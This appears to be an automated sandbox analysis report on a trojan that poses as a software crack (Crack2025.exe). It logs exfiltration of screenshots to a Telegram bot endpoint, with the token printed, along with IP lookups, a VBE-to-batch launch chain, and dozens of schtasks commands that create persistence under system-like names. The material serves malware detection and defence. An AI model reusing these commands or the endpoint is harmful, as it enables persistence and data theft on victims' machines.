Source: global traffic, HTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="5eb2d835-abd6-4474-a3dd-17afeda6da5e" Host: api.telegram.org Content-Length: 91505 Expect: 100-continue Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic, HTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="188a4226-8bbc-4d37-89a4-a0946ab71950" Host: api.telegram.org Content-Length: 94182 Expect: 100-continue Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 34.117.59.81
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: ipinfo.io
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 34.117.59.81:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 34.117.59.81:443
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: 009383cm.nyashk.ru
                          Source: unknownHTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="5eb2d835-abd6-4474-a3dd-17afeda6da5e"Host: api.telegram.orgContent-Length: 91505Expect: 100-continueConnection: Keep-Alive
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482140681.0000000000CD2000.00000002.00000001.01000000.00000000.sdmp, KbrbnaEo.log.9.dr | String found in binary or memory: https://api.telegram.org/bot
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhotoX
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482140681.0000000000CD2000.00000002.00000001.01000000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, KbrbnaEo.log.9.dr | String found in binary or memory: https://ipinfo.io/country
                          Source: ComComponentRuntimeMonitor.exe, 00000009.00000002.1482140681.0000000000CD2000.00000002.00000001.01000000.00000000.sdmp, ComComponentRuntimeMonitor.exe, 00000009.00000002.1482451462.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, KbrbnaEo.log.9.dr | String found in binary or memory: https://ipinfo.io/ip
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
                          Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49724 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49738 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49740 version: TLS 1.2

                          System Summary

                          Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                          Source: C:\Users\user\Desktop\Crack2025.exe | Code function: 0_2_00B46FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | File created: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | File created: C:\Windows\ShellExperiences\309f4f93f5dc84
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP
                          Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\AtYLDxzH.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                          Source: C:\Users\user\Desktop\Crack2025.exe | Code function: String function: 00B5F5F0 appears 31 times
                          Source: C:\Users\user\Desktop\Crack2025.exe | Code function: String function: 00B5EC50 appears 56 times
                          Source: C:\Users\user\Desktop\Crack2025.exe | Code function: String function: 00B5EB78 appears 39 times
                          Source: Crack2025.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: ComComponentRuntimeMonitor.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Registry.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: smartscreen.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: aePhPQ5epIOPbGayHv.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: ShellExperienceHost.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: xP1x1VNeIAPjWsHHYbBFNFY.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@40/33@4/2
                          Source: C:\Users\user\Desktop\Crack2025.exe | Code function: 0_2_00B46C74 GetLastError,FormatMessageW
                          Source: C:\Users\user\Desktop\Crack2025.exe | Code function: 0_2_00B5A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | File created: C:\Users\user\Desktop\ZgWXldfI.log
                          Source: C:\Users\Public\Pictures\Registry.exe | Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8716:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-lyFL9C96UdpRArWkuUmQ
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | File created: C:\Users\user\AppData\Local\Temp\zmghpwjx
                          Source: C:\Users\user\Desktop\Crack2025.exe | Command line argument: sfxname | 0_2_00B5DF1E
                          Source: C:\Users\user\Desktop\Crack2025.exe | Command line argument: sfxstime | 0_2_00B5DF1E
                          Source: C:\Users\user\Desktop\Crack2025.exe | Command line argument: STARTDLG | 0_2_00B5DF1E
                          Source: Crack2025.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\Crack2025.exe | File read: C:\Windows\win.ini
                          Source: C:\Users\user\Desktop\Crack2025.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: Crack2025.exe | Virustotal: Detection: 72%
                          Source: Crack2025.exe | ReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\Crack2025.exe | File read: C:\Users\user\Desktop\Crack2025.exe
                          Source: unknown | Process created: C:\Users\user\Desktop\Crack2025.exe "C:\Users\user\Desktop\Crack2025.exe"
                          Source: C:\Users\user\Desktop\Crack2025.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Crtsvc\wDGuVcXResLqCSg5nclCwVUnbT.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Crtsvc\ComComponentRuntimeMonitor.exe "C:\Crtsvc/ComComponentRuntimeMonitor.exe"
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 9 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFY" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f
                          Source: unknown | Process created: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xP1x1VNeIAPjWsHHYbBFNFYx" /sc MINUTE /mo 5 /tr "'C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zmghpwjx\zmghpwjx.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD4D5.tmp" "c:\Windows\System32\CSCFA026A3CF3B54234ABC92E8882BC4427.TMP"
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Desktop\ShellExperienceHost.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 10 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aePhPQ5epIOPbGayHv" /sc ONLOGON /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aePhPQ5epIOPbGayHva" /sc MINUTE /mo 8 /tr "'C:\Crtsvc\aePhPQ5epIOPbGayHv.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\smartscreen.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\smartscreen.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Pictures\Registry.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\Registry.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 5 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComComponentRuntimeMonitor" /sc ONLOGON /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ComComponentRuntimeMonitorC" /sc MINUTE /mo 6 /tr "'C:\Crtsvc\ComComponentRuntimeMonitor.exe'" /rl HIGHEST /f
                          Source: unknown | Process created: C:\Crtsvc\aePhPQ5epIOPbGayHv.exe C:\Crtsvc\aePhPQ5epIOPbGayHv.exe
                          Source: unknown | Process created: C:\Crtsvc\ComComponentRuntimeMonitor.exe C:\Crtsvc\ComComponentRuntimeMonitor.exe
                          Source: unknown | Process created: C:\Users\Public\Pictures\Registry.exe C:\Users\Public\Pictures\Registry.exe
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exe | Process created: unknown unknown
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: version.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Crtsvc\ComComponentRuntimeMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\ShellExperiences\xP1x1VNeIAPjWsHHYbBFNFY.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
